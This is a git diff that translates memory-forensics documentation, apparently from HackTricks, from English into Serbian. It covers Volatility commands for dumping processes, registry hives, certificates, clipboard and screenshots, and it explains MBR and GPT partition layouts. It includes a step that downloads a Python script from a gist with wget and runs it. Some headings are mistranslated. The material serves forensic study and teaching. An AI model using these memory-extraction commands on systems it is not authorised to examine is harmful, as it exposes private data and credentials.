-Commands executed in `cmd.exe` are managed by **`conhost.exe`** (or `csrss.exe` on systems before Windows 7). This means that if **`cmd.exe`** is terminated by an attacker before a memory dump is obtained, it's still possible to recover the session's command history from the memory of **`conhost.exe`**. To do this, if unusual activity is detected within the console's modules, the memory of the associated **`conhost.exe`** process should be dumped. Then, by searching for **strings** within this dump, command lines used in the session can potentially be extracted.
+Komande izvršene u `cmd.exe` upravlja **`conhost.exe`** (ili `csrss.exe` na sistemima pre Windows 7). To znači da, ako **`cmd.exe`** bude prekinut od strane napadača pre nego što se dobije memorijski dump, još uvek je moguće povratiti istoriju komandi sesije iz memorije **`conhost.exe`**. Da bi se to uradilo, ako se otkrije neobična aktivnost unutar modula konzole, memorija povezanog **`conhost.exe`** procesa treba da se dumpuje. Zatim, pretraživanjem **stringova** unutar ovog dumpa, mogu se potencijalno izvući komandne linije korišćene u sesiji.
 
-### Environment
+### Okruženje
 
-Get the env variables of each running process. There could be some interesting values.
+Dobijte env varijable svakog pokrenutog procesa. Mogu postojati neki zanimljivi vrednosti.
 
 {{#tabs}}
 {{#tab name="vol3"}}
-
 ```bash
 python3 vol.py -f file.dmp windows.envars.Envars [--pid ] #Display process environment variables
 ```
-
 {{#endtab}}
 
 {{#tab name="vol2"}}
-
 ```bash
 volatility --profile=PROFILE envars -f file.dmp [--pid ] #Display process environment variables
 
 volatility --profile=PROFILE -f file.dmp linux_psenv [-p ] #Get env of process. runlevel var means the runlevel where the proc is initated
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
-### Token privileges
+### Token privilegije
 
-Check for privileges tokens in unexpected services.\
-It could be interesting to list the processes using some privileged token.
+Proverite privilegovane tokene u neočekivanim servisima.\
+Može biti zanimljivo napraviti spisak procesa koji koriste neki privilegovani token.
 
 {{#tabs}}
 {{#tab name="vol3"}}
-
 ```bash
 #Get enabled privileges of some processes
 python3 vol.py -f file.dmp windows.privileges.Privs [--pid ]
 #Get all processes with interesting privileges
 python3 vol.py -f file.dmp windows.privileges.Privs | grep "SeImpersonatePrivilege\|SeAssignPrimaryPrivilege\|SeTcbPrivilege\|SeBackupPrivilege\|SeRestorePrivilege\|SeCreateTokenPrivilege\|SeLoadDriverPrivilege\|SeTakeOwnershipPrivilege\|SeDebugPrivilege"
 ```
-
 {{#endtab}}
 
 {{#tab name="vol2"}}
-
 ```bash
 #Get enabled privileges of some processes
 volatility --profile=Win7SP1x86_23418 privs --pid=3152 -f file.dmp | grep Enabled
 #Get all processes with interesting privileges
 volatility --profile=Win7SP1x86_23418 privs -f file.dmp | grep "SeImpersonatePrivilege\|SeAssignPrimaryPrivilege\|SeTcbPrivilege\|SeBackupPrivilege\|SeRestorePrivilege\|SeCreateTokenPrivilege\|SeLoadDriverPrivilege\|SeTakeOwnershipPrivilege\|SeDebugPrivilege"
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
 ### SIDs
 
-Check each SSID owned by a process.\
-It could be interesting to list the processes using a privileges SID (and the processes using some service SID).
+Proverite svaki SSID koji poseduje proces.\
+Može biti zanimljivo navesti procese koji koriste SID sa privilegijama (i procese koji koriste neki servisni SID).
 
 {{#tabs}}
 {{#tab name="vol3"}}
-
 ```bash
 ./vol.py -f file.dmp windows.getsids.GetSIDs [--pid ] #Get SIDs of processes
 ./vol.py -f file.dmp windows.getservicesids.GetServiceSIDs #Get the SID of services
 ```
-
 {{#endtab}}
 
 {{#tab name="vol2"}}
-
 ```bash
 volatility --profile=Win7SP1x86_23418 getsids -f file.dmp #Get the SID owned by each process
 volatility --profile=Win7SP1x86_23418 getservicesids -f file.dmp #Get the SID of each service
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
 ### Handles
 
-Useful to know to which other files, keys, threads, processes... a **process has a handle** for (has opened)
+Koristan je znati na koje druge datoteke, ključeve, niti, procese... **proces ima handle** (otvorene su)
 
 {{#tabs}}
 {{#tab name="vol3"}}
-
 ```bash
 vol.py -f file.dmp windows.handles.Handles [--pid ]
 ```
-
 {{#endtab}}
 
 {{#tab name="vol2"}}
-
 ```bash
 volatility --profile=Win7SP1x86_23418 -f file.dmp handles [--pid=]
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
@@ -378,40 +310,33 @@ volatility --profile=Win7SP1x86_23418 -f file.dmp handles [--pid=]
 
 {{#tabs}}
 {{#tab name="vol3"}}
-
 ```bash
 ./vol.py -f file.dmp windows.dlllist.DllList [--pid ] #List dlls used by each
 ./vol.py -f file.dmp windows.dumpfiles.DumpFiles --pid  #Dump the .exe and dlls of the process in the current directory process
 ```
-
 {{#endtab}}
 
 {{#tab name="vol2"}}
-
 ```bash
 volatility --profile=Win7SP1x86_23418 dlllist --pid=3152 -f file.dmp #Get dlls of a proc
 volatility --profile=Win7SP1x86_23418 dlldump --pid=3152 --dump-dir=. -f file.dmp #Dump dlls of a proc
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
-### Strings per processes
+### Stringovi po procesima
 
-Volatility allows us to check which process a string belongs to.
+Volatility nam omogućava da proverimo kojem procesu pripada string.
 
 {{#tabs}}
 {{#tab name="vol3"}}
-
 ```bash
 strings file.dmp > /tmp/strings.txt
 ./vol.py -f /tmp/file.dmp windows.strings.Strings --strings-file /tmp/strings.txt
 ```
-
 {{#endtab}}
 
 {{#tab name="vol2"}}
-
 ```bash
 strings file.dmp > /tmp/strings.txt
 volatility -f /tmp/file.dmp windows.strings.Strings --string-file /tmp/strings.txt
@@ -419,99 +344,78 @@ volatility -f /tmp/file.dmp windows.strings.Strings --string-file /tmp/strings.t
 volatility -f /tmp/file.dmp --profile=Win81U1x64 memdump -p 3532 --dump-dir .
 strings 3532.dmp > strings_file
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
-It also allows to search for strings inside a process using the yarascan module:
+Takođe omogućava pretragu stringova unutar procesa koristeći yarascan modul:
 
 {{#tabs}}
 {{#tab name="vol3"}}
-
 ```bash
 ./vol.py -f file.dmp windows.vadyarascan.VadYaraScan --yara-rules "https://" --pid 3692 3840 3976 3312 3084 2784
 ./vol.py -f file.dmp yarascan.YaraScan --yara-rules "https://"
 ```
-
 {{#endtab}}
 
 {{#tab name="vol2"}}
-
 ```bash
 volatility --profile=Win7SP1x86_23418 yarascan -Y "https://" -p 3692,3840,3976,3312,3084,2784
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
 ### UserAssist
 
-**Windows** keeps track of programs you run using a feature in the registry called **UserAssist keys**. These keys record how many times each program is executed and when it was last run.
+**Windows** prati programe koje pokrećete koristeći funkciju u registru nazvanu **UserAssist ključevi**. Ovi ključevi beleže koliko puta je svaki program pokrenut i kada je poslednji put pokrenut.
 
 {{#tabs}}
 {{#tab name="vol3"}}
-
 ```bash
 ./vol.py -f file.dmp windows.registry.userassist.UserAssist
 ```
-
 {{#endtab}}
 
 {{#tab name="vol2"}}
-
 ```
 volatility --profile=Win7SP1x86_23418 -f file.dmp userassist
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
 ​
 
-

 
-​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
-
-{% embed url="https://www.rootedcon.com/" %}
-
-## Services
+## Usluge
 
 {{#tabs}}
 {{#tab name="vol3"}}
-
 ```bash
 ./vol.py -f file.dmp windows.svcscan.SvcScan #List services
 ./vol.py -f file.dmp windows.getservicesids.GetServiceSIDs #Get the SID of services
 ```
-
 {{#endtab}}
 
 {{#tab name="vol2"}}
-
 ```bash
 #Get services and binary path
 volatility --profile=Win7SP1x86_23418 svcscan -f file.dmp
 #Get name of the services and SID (slow)
 volatility --profile=Win7SP1x86_23418 getservicesids -f file.dmp
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
-## Network
+## Mreža
 
 {{#tabs}}
 {{#tab name="vol3"}}
-
 ```bash
 ./vol.py -f file.dmp windows.netscan.NetScan
 #For network info of linux use volatility2
 ```
-
 {{#endtab}}
 
 {{#tab name="vol2"}}
-
 ```bash
 volatility --profile=Win7SP1x86_23418 netscan -f file.dmp
 volatility --profile=Win7SP1x86_23418 connections -f file.dmp#XP and 2003 only
@@ -526,102 +430,84 @@ volatility --profile=SomeLinux -f file.dmp linux_arp #ARP table
 volatility --profile=SomeLinux -f file.dmp linux_list_raw #Processes using promiscuous raw sockets (comm between processes)
 volatility --profile=SomeLinux -f file.dmp linux_route_cache
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
 ## Registry hive
 
-### Print available hives
+### Ispis dostupnih hives
 
 {{#tabs}}
 {{#tab name="vol3"}}
-
 ```bash
 ./vol.py -f file.dmp windows.registry.hivelist.HiveList #List roots
 ./vol.py -f file.dmp windows.registry.printkey.PrintKey #List roots and get initial subkeys
 ```
-
 {{#endtab}}
 
 {{#tab name="vol2"}}
-
 ```bash
 volatility --profile=Win7SP1x86_23418 -f file.dmp hivelist #List roots
 volatility --profile=Win7SP1x86_23418 -f file.dmp printkey #List roots and get initial subkeys
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
-### Get a value
+### Dobijanje vrednosti
 
 {{#tabs}}
 {{#tab name="vol3"}}
-
 ```bash
 ./vol.py -f file.dmp windows.registry.printkey.PrintKey --key "Software\Microsoft\Windows NT\CurrentVersion"
 ```
-
 {{#endtab}}
 
 {{#tab name="vol2"}}
-
 ```bash
 volatility --profile=Win7SP1x86_23418 printkey -K "Software\Microsoft\Windows NT\CurrentVersion" -f file.dmp
 # Get Run binaries registry value
 volatility -f file.dmp --profile=Win7SP1x86 printkey -o 0x9670e9d0 -K 'Software\Microsoft\Windows\CurrentVersion\Run'
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
 ### Dump
-
 ```bash
 #Dump a hive
 volatility --profile=Win7SP1x86_23418 hivedump -o 0x9aad6148 -f file.dmp #Offset extracted by hivelist
 #Dump all hives
 volatility --profile=Win7SP1x86_23418 hivedump -f file.dmp
 ```
+## Datotečni sistem
 
-## Filesystem
-
-### Mount
+### Montiranje
 
 {{#tabs}}
 {{#tab name="vol3"}}
-
 ```bash
 #See vol2
 ```
-
 {{#endtab}}
 
 {{#tab name="vol2"}}
-
 ```bash
 volatility --profile=SomeLinux -f file.dmp linux_mount
 volatility --profile=SomeLinux -f file.dmp linux_recover_filesystem #Dump the entire filesystem (if possible)
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
-### Scan/dump
+### Skener/izbacivanje
 
 {{#tabs}}
 {{#tab name="vol3"}}
-
 ```bash
 ./vol.py -f file.dmp windows.filescan.FileScan #Scan for files inside the dump
 ./vol.py -f file.dmp windows.dumpfiles.DumpFiles --physaddr <0xAAAAA> #Offset from previous command
 ```
-
 {{#endtab}}
 
 {{#tab name="vol2"}}
-
 ```bash
 volatility --profile=Win7SP1x86_23418 filescan -f file.dmp #Scan for files inside the dump
 volatility --profile=Win7SP1x86_23418 dumpfiles -n --dump-dir=/tmp -f file.dmp #Dump all files
@@ -631,60 +517,44 @@ volatility --profile=SomeLinux -f file.dmp linux_enumerate_files
 volatility --profile=SomeLinux -f file.dmp linux_find_file -F /path/to/file
 volatility --profile=SomeLinux -f file.dmp linux_find_file -i 0xINODENUMBER -O /path/to/dump/file
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
 ### Master File Table
-
-{{#tabs}}
-{{#tab name="vol3"}}
-
 ```bash
 # I couldn't find any plugin to extract this information in volatility3
 ```
-
 {{#endtab}}
 
 {{#tab name="vol2"}}
-
 ```bash
 volatility --profile=Win7SP1x86_23418 mftparser -f file.dmp
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
-The **NTFS file system** uses a critical component known as the _master file table_ (MFT). This table includes at least one entry for every file on a volume, covering the MFT itself too. Vital details about each file, such as **size, timestamps, permissions, and actual data**, are encapsulated within the MFT entries or in areas external to the MFT but referenced by these entries. More details can be found in the [official documentation](https://docs.microsoft.com/en-us/windows/win32/fileio/master-file-table).
+**NTFS datotečni sistem** koristi kritičnu komponentu poznatu kao _master file table_ (MFT). Ova tabela uključuje barem jedan unos za svaku datoteku na volumenu, pokrivajući i samu MFT. Vitalni detalji o svakoj datoteci, kao što su **veličina, vremenske oznake, dozvole i stvarni podaci**, su enkapsulirani unutar MFT unosa ili u oblastima van MFT, ali na koje se pozivaju ovi unosi. Više detalja može se naći u [official documentation](https://docs.microsoft.com/en-us/windows/win32/fileio/master-file-table).
 
-### SSL Keys/Certs
+### SSL Ključevi/Cerifikati
 
 {{#tabs}}
 {{#tab name="vol3"}}
-
 ```bash
 #vol3 allows to search for certificates inside the registry
 ./vol.py -f file.dmp windows.registry.certificates.Certificates
 ```
-
 {{#endtab}}
 
 {{#tab name="vol2"}}
-
 ```bash
 #vol2 allos you to search and dump certificates from memory
 #Interesting options for this modules are: --pid, --name, --ssl
 volatility --profile=Win7SP1x86_23418 dumpcerts --dump-dir=. -f file.dmp
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
 ## Malware
-
-{{#tabs}}
-{{#tab name="vol3"}}
-
 ```bash
 ./vol.py -f file.dmp windows.malfind.Malfind [--dump] #Find hidden and injected code, [dump each suspicious section]
 #Malfind will search for suspicious structures related to malware
@@ -698,11 +568,9 @@ volatility --profile=Win7SP1x86_23418 dumpcerts --dump-dir=. -f file.dmp
 ./vol.py -f file.dmp linux.check_modules.Check_modules #Compares module list to sysfs info, if available
 ./vol.py -f file.dmp linux.tty_check.tty_check #Checks tty devices for hooks
 ```
-
 {{#endtab}}
 
 {{#tab name="vol2"}}
-
 ```bash
 volatility --profile=Win7SP1x86_23418 -f file.dmp malfind [-D /tmp] #Find hidden and injected code [dump each suspicious section]
 volatility --profile=Win7SP1x86_23418 -f file.dmp apihooks #Detect API hooks in process and kernel memory
@@ -718,18 +586,16 @@ volatility --profile=SomeLinux -f file.dmp linux_check_modules
 volatility --profile=SomeLinux -f file.dmp linux_check_tty
 volatility --profile=SomeLinux -f file.dmp linux_keyboard_notifiers #Keyloggers
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
-### Scanning with yara
+### Skener sa yara
 
-Use this script to download and merge all the yara malware rules from github: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\
-Create the _**rules**_ directory and execute it. This will create a file called _**malware_rules.yar**_ which contains all the yara rules for malware.
+Koristite ovaj skript za preuzimanje i spajanje svih yara pravila za malver sa github-a: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\
+Kreirajte _**rules**_ direktorijum i izvršite ga. Ovo će kreirati datoteku pod nazivom _**malware_rules.yar**_ koja sadrži sva yara pravila za malver.
 
 {{#tabs}}
 {{#tab name="vol3"}}
-
 ```bash
 wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py
 mkdir rules
@@ -739,191 +605,149 @@ python malware_yara_rules.py
 #All
 ./vol.py -f file.dmp yarascan.YaraScan --yara-file /tmp/malware_rules.yar
 ```
-
 {{#endtab}}
 
 {{#tab name="vol2"}}
-
 ```bash
 wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py
 mkdir rules
 python malware_yara_rules.py
 volatility --profile=Win7SP1x86_23418 yarascan -y malware_rules.yar -f ch2.dmp | grep "Rule:" | grep -v "Str_Win32" | sort | uniq
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
 ## MISC
 
-### External plugins
+### Eksterni dodaci
 
-If you want to use external plugins make sure that the folders related to the plugins are the first parameter used.
+Ako želite da koristite eksterne dodatke, uverite se da su fascikle povezane sa dodacima prvi parametar koji se koristi.
 
 {{#tabs}}
 {{#tab name="vol3"}}
-
 ```bash
 ./vol.py --plugin-dirs "/tmp/plugins/" [...]
 ```
-
 {{#endtab}}
 
 {{#tab name="vol2"}}
-
 ```bash
- volatilitye --plugins="/tmp/plugins/" [...]
+volatilitye --plugins="/tmp/plugins/" [...]
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
 #### Autoruns
 
-Download it from [https://github.com/tomchop/volatility-autoruns](https://github.com/tomchop/volatility-autoruns)
-
+Preuzmite ga sa [https://github.com/tomchop/volatility-autoruns](https://github.com/tomchop/volatility-autoruns)
 ```
- volatility --plugins=volatility-autoruns/ --profile=WinXPSP2x86 -f file.dmp autoruns
+volatility --plugins=volatility-autoruns/ --profile=WinXPSP2x86 -f file.dmp autoruns
 ```
-
 ### Mutexes
 
 {{#tabs}}
 {{#tab name="vol3"}}
-
 ```
 ./vol.py -f file.dmp windows.mutantscan.MutantScan
 ```
-
 {{#endtab}}
 
 {{#tab name="vol2"}}
-
 ```bash
 volatility --profile=Win7SP1x86_23418 mutantscan -f file.dmp
 volatility --profile=Win7SP1x86_23418 -f file.dmp handles -p  -t mutant
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
-### Symlinks
-
-{{#tabs}}
-{{#tab name="vol3"}}
-
+### Simboličke veze
 ```bash
 ./vol.py -f file.dmp windows.symlinkscan.SymlinkScan
 ```
-
 {{#endtab}}
 
 {{#tab name="vol2"}}
-
 ```bash
 volatility --profile=Win7SP1x86_23418 -f file.dmp symlinkscan
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
 ### Bash
 
-It's possible to **read from memory the bash history.** You could also dump the _.bash_history_ file, but it was disabled you will be glad you can use this volatility module
+Moguće je **pročitati bash istoriju iz memorije.** Takođe možete izvući _.bash_history_ fajl, ali je on onemogućen, bićete srećni što možete koristiti ovaj volatility modul
 
 {{#tabs}}
 {{#tab name="vol3"}}
-
 ```
 ./vol.py -f file.dmp linux.bash.Bash
 ```
-
 {{#endtab}}
 
 {{#tab name="vol2"}}
-
 ```
 volatility --profile=Win7SP1x86_23418 -f file.dmp linux_bash
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
-### TimeLine
+### Vremenska Linija
 
 {{#tabs}}
 {{#tab name="vol3"}}
-
 ```bash
 ./vol.py -f file.dmp timeLiner.TimeLiner
 ```
-
 {{#endtab}}
 
 {{#tab name="vol2"}}
-
 ```
 volatility --profile=Win7SP1x86_23418 -f timeliner
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
-### Drivers
+### Drajveri
 
 {{#tabs}}
 {{#tab name="vol3"}}
-
 ```
 ./vol.py -f file.dmp windows.driverscan.DriverScan
 ```
-
 {{#endtab}}
 
 {{#tab name="vol2"}}
-
 ```bash
 volatility --profile=Win7SP1x86_23418 -f file.dmp driverscan
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
-### Get clipboard
-
+### Uzmi sadržaj iz međuspremnika
 ```bash
 #Just vol2
 volatility --profile=Win7SP1x86_23418 clipboard -f file.dmp
 ```
-
-### Get IE history
-
+### Dobijanje IE istorije
 ```bash
 #Just vol2
 volatility --profile=Win7SP1x86_23418 iehistory -f file.dmp
 ```
-
-### Get notepad text
-
+### Dobijanje teksta iz notepada
 ```bash
 #Just vol2
 volatility --profile=Win7SP1x86_23418 notepad -f file.dmp
 ```
-
 ### Screenshot
-
 ```bash
 #Just vol2
 volatility --profile=Win7SP1x86_23418 screenshot -f file.dmp
 ```
-
 ### Master Boot Record (MBR)
-
 ```bash
 volatility --profile=Win7SP1x86_23418 mbrparser -f file.dmp
 ```
-
-The **Master Boot Record (MBR)** plays a crucial role in managing the logical partitions of a storage medium, which are structured with different [file systems](https://en.wikipedia.org/wiki/File_system). It not only holds partition layout information but also contains executable code acting as a boot loader. This boot loader either directly initiates the OS's second-stage loading process (see [second-stage boot loader](https://en.wikipedia.org/wiki/Second-stage_boot_loader)) or works in harmony with the [volume boot record](https://en.wikipedia.org/wiki/Volume_boot_record) (VBR) of each partition. For in-depth knowledge, refer to the [MBR Wikipedia page](https://en.wikipedia.org/wiki/Master_boot_record).
+**Master Boot Record (MBR)** igra ključnu ulogu u upravljanju logičkim particijama skladišnog medija, koje su strukturirane sa različitim [file systems](https://en.wikipedia.org/wiki/File_system). On ne samo da sadrži informacije o rasporedu particija, već takođe sadrži izvršni kod koji deluje kao boot loader. Ovaj boot loader ili direktno pokreće proces učitavanja drugog stepena OS-a (vidi [second-stage boot loader](https://en.wikipedia.org/wiki/Second-stage_boot_loader)) ili radi u harmoniji sa [volume boot record](https://en.wikipedia.org/wiki/Volume_boot_record) (VBR) svake particije. Za detaljno znanje, pogledajte [MBR Wikipedia page](https://en.wikipedia.org/wiki/Master_boot_record).
 
 ## References
 
@@ -933,10 +757,4 @@ The **Master Boot Record (MBR)** plays a crucial role in managing the logical pa
 - [https://www.aldeid.com/wiki/Windows-userassist-keys](https://www.aldeid.com/wiki/Windows-userassist-keys) ​\* [https://learn.microsoft.com/en-us/windows/win32/fileio/master-file-table](https://learn.microsoft.com/en-us/windows/win32/fileio/master-file-table)
 - [https://answers.microsoft.com/en-us/windows/forum/all/uefi-based-pc-protective-mbr-what-is-it/0fc7b558-d8d4-4a7d-bae2-395455bb19aa](https://answers.microsoft.com/en-us/windows/forum/all/uefi-based-pc-protective-mbr-what-is-it/0fc7b558-d8d4-4a7d-bae2-395455bb19aa)
 
-

-
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
-
-{% embed url="https://www.rootedcon.com/" %}
-
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md
index 9ac27c92e..7dbfb607b 100644
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md
@@ -4,20 +4,20 @@
 
 ## Partitions
 
-A hard drive or an **SSD disk can contain different partitions** with the goal of separating data physically.\
-The **minimum** unit of a disk is the **sector** (normally composed of 512B). So, each partition size needs to be multiple of that size.
+Hard disk ili **SSD disk može sadržati različite particije** sa ciljem fizičkog razdvajanja podataka.\
+**Minimalna** jedinica diska je **sektor** (normalno sastavljen od 512B). Tako da, veličina svake particije mora biti višekratnik te veličine.
 
 ### MBR (master Boot Record)
 
-It's allocated in the **first sector of the disk after the 446B of the boot code**. This sector is essential to indicate to the PC what and from where a partition should be mounted.\
-It allows up to **4 partitions** (at most **just 1** can be active/**bootable**). However, if you need more partitions you can use **extended partitions**. The **final byte** of this first sector is the boot record signature **0x55AA**. Only one partition can be marked as active.\
-MBR allows **max 2.2TB**.
+Dodeljuje se u **prvom sektoru diska nakon 446B boot koda**. Ovaj sektor je ključan za indikaciju PC-u šta i odakle treba da se montira particija.\
+Omogućava do **4 particije** (najviše **samo 1** može biti aktivna/**bootable**). Međutim, ako vam je potrebno više particija, možete koristiti **proširene particije**. **Zadnji bajt** ovog prvog sektora je potpis boot zapisa **0x55AA**. Samo jedna particija može biti označena kao aktivna.\
+MBR omogućava **maksimalno 2.2TB**.
 
 ![](<../../../images/image (350).png>)
 
 ![](<../../../images/image (304).png>)
 
-From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Signature** (if Windows is used). The logical drive letter of the hard disk depends on the Windows Disk Signature. Changing this signature could prevent Windows from booting (tool: [**Active Disk Editor**](https://www.disk-editor.org/index.html)**)**.
+Od **bajtova 440 do 443** MBR-a možete pronaći **Windows Disk Signature** (ako se koristi Windows). Logičko slovo diska hard diska zavisi od Windows Disk Signature. Promena ovog potpisa može sprečiti Windows da se pokrene (alat: [**Active Disk Editor**](https://www.disk-editor.org/index.html)**)**.
 
 ![](<../../../images/image (310).png>)
 
@@ -26,122 +26,120 @@ From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Sig
 | Offset      | Length     | Item                |
 | ----------- | ---------- | ------------------- |
 | 0 (0x00)    | 446(0x1BE) | Boot code           |
-| 446 (0x1BE) | 16 (0x10)  | First Partition     |
-| 462 (0x1CE) | 16 (0x10)  | Second Partition    |
-| 478 (0x1DE) | 16 (0x10)  | Third Partition     |
-| 494 (0x1EE) | 16 (0x10)  | Fourth Partition    |
-| 510 (0x1FE) | 2 (0x2)    | Signature 0x55 0xAA |
+| 446 (0x1BE) | 16 (0x10)  | Prva particija     |
+| 462 (0x1CE) | 16 (0x10)  | Druga particija    |
+| 478 (0x1DE) | 16 (0x10)  | Treća particija    |
+| 494 (0x1EE) | 16 (0x10)  | Četvrta particija   |
+| 510 (0x1FE) | 2 (0x2)    | Potpis 0x55 0xAA   |
 
-**Partition Record Format**
+**Format zapisa particije**
 
 | Offset    | Length   | Item                                                   |
 | --------- | -------- | ------------------------------------------------------ |
-| 0 (0x00)  | 1 (0x01) | Active flag (0x80 = bootable)                          |
-| 1 (0x01)  | 1 (0x01) | Start head                                             |
-| 2 (0x02)  | 1 (0x01) | Start sector (bits 0-5); upper bits of cylinder (6- 7) |
-| 3 (0x03)  | 1 (0x01) | Start cylinder lowest 8 bits                           |
-| 4 (0x04)  | 1 (0x01) | Partition type code (0x83 = Linux)                     |
-| 5 (0x05)  | 1 (0x01) | End head                                               |
-| 6 (0x06)  | 1 (0x01) | End sector (bits 0-5); upper bits of cylinder (6- 7)   |
-| 7 (0x07)  | 1 (0x01) | End cylinder lowest 8 bits                             |
-| 8 (0x08)  | 4 (0x04) | Sectors preceding partition (little endian)            |
-| 12 (0x0C) | 4 (0x04) | Sectors in partition                                   |
+| 0 (0x00)  | 1 (0x01) | Aktivna zastavica (0x80 = bootable)                   |
+| 1 (0x01)  | 1 (0x01) | Početna glava                                         |
+| 2 (0x02)  | 1 (0x01) | Početni sektor (bitovi 0-5); gornji bitovi cilindra (6- 7) |
+| 3 (0x03)  | 1 (0x01) | Početni cilindar najniži 8 bitova                    |
+| 4 (0x04)  | 1 (0x01) | Kod tipa particije (0x83 = Linux)                     |
+| 5 (0x05)  | 1 (0x01) | Kraj glave                                           |
+| 6 (0x06)  | 1 (0x01) | Kraj sektora (bitovi 0-5); gornji bitovi cilindra (6- 7)   |
+| 7 (0x07)  | 1 (0x01) | Kraj cilindra najniži 8 bitova                       |
+| 8 (0x08)  | 4 (0x04) | Sektori koji prethode particiji (little endian)      |
+| 12 (0x0C) | 4 (0x04) | Sektori u particiji                                   |
 
-In order to mount an MBR in Linux you first need to get the start offset (you can use `fdisk` and the `p` command)
+Da biste montirali MBR u Linux-u, prvo morate dobiti početni offset (možete koristiti `fdisk` i komandu `p`)
 
 ![](<../../../images/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
 
-And then use the following code
-
+A zatim koristite sledeći kod
 ```bash
 #Mount MBR in Linux
 mount -o ro,loop,offset=
 #63x512 = 32256Bytes
 mount -o ro,loop,offset=32256,noatime /path/to/image.dd /media/part/
 ```
+**LBA (Logičko adresiranje blokova)**
 
-**LBA (Logical block addressing)**
+**Logičko adresiranje blokova** (**LBA**) je uobičajen sistem koji se koristi za **specifikaciju lokacije blokova** podataka koji se čuvaju na uređajima za skladištenje računara, obično na sekundarnim sistemima skladištenja kao što su hard diskovi. LBA je posebno jednostavan linearni sistem adresiranja; **blokovi se lociraju pomoću celobrojnog indeksa**, pri čemu je prvi blok LBA 0, drugi LBA 1, i tako dalje.
 
-**Logical block addressing** (**LBA**) is a common scheme used for **specifying the location of blocks** of data stored on computer storage devices, generally secondary storage systems such as hard disk drives. LBA is a particularly simple linear addressing scheme; **blocks are located by an integer index**, with the first block being LBA 0, the second LBA 1, and so on.
+### GPT (GUID tabela particija)
 
-### GPT (GUID Partition Table)
+GUID tabela particija, poznata kao GPT, favorizovana je zbog svojih poboljšanih mogućnosti u poređenju sa MBR (Master Boot Record). Karakteristična po svom **globalno jedinstvenom identifikatoru** za particije, GPT se izdvaja na nekoliko načina:
 
-The GUID Partition Table, known as GPT, is favored for its enhanced capabilities compared to MBR (Master Boot Record). Distinctive for its **globally unique identifier** for partitions, GPT stands out in several ways:
+- **Lokacija i veličina**: I GPT i MBR počinju na **sektoru 0**. Međutim, GPT radi na **64bita**, u kontrastu sa MBR-ovih 32bita.
+- **Ograničenja particija**: GPT podržava do **128 particija** na Windows sistemima i može da primi do **9.4ZB** podataka.
+- **Imena particija**: Omogućava imenovanje particija sa do 36 Unicode karaktera.
 
-- **Location and Size**: Both GPT and MBR start at **sector 0**. However, GPT operates on **64bits**, contrasting with MBR's 32bits.
-- **Partition Limits**: GPT supports up to **128 partitions** on Windows systems and accommodates up to **9.4ZB** of data.
-- **Partition Names**: Offers the ability to name partitions with up to 36 Unicode characters.
+**Otpornost podataka i oporavak**:
 
-**Data Resilience and Recovery**:
+- **Redundancija**: Za razliku od MBR-a, GPT ne ograničava particionisanje i podatke o pokretanju na jedno mesto. Replikuje ove podatke širom diska, poboljšavajući integritet i otpornost podataka.
+- **Ciklična kontrola redundancije (CRC)**: GPT koristi CRC za osiguranje integriteta podataka. Aktivno prati oštećenje podataka, a kada se otkrije, GPT pokušava da povrati oštećene podatke sa druge lokacije na disku.
 
-- **Redundancy**: Unlike MBR, GPT doesn't confine partitioning and boot data to a single place. It replicates this data across the disk, enhancing data integrity and resilience.
-- **Cyclic Redundancy Check (CRC)**: GPT employs CRC to ensure data integrity. It actively monitors for data corruption, and when detected, GPT attempts to recover the corrupted data from another disk location.
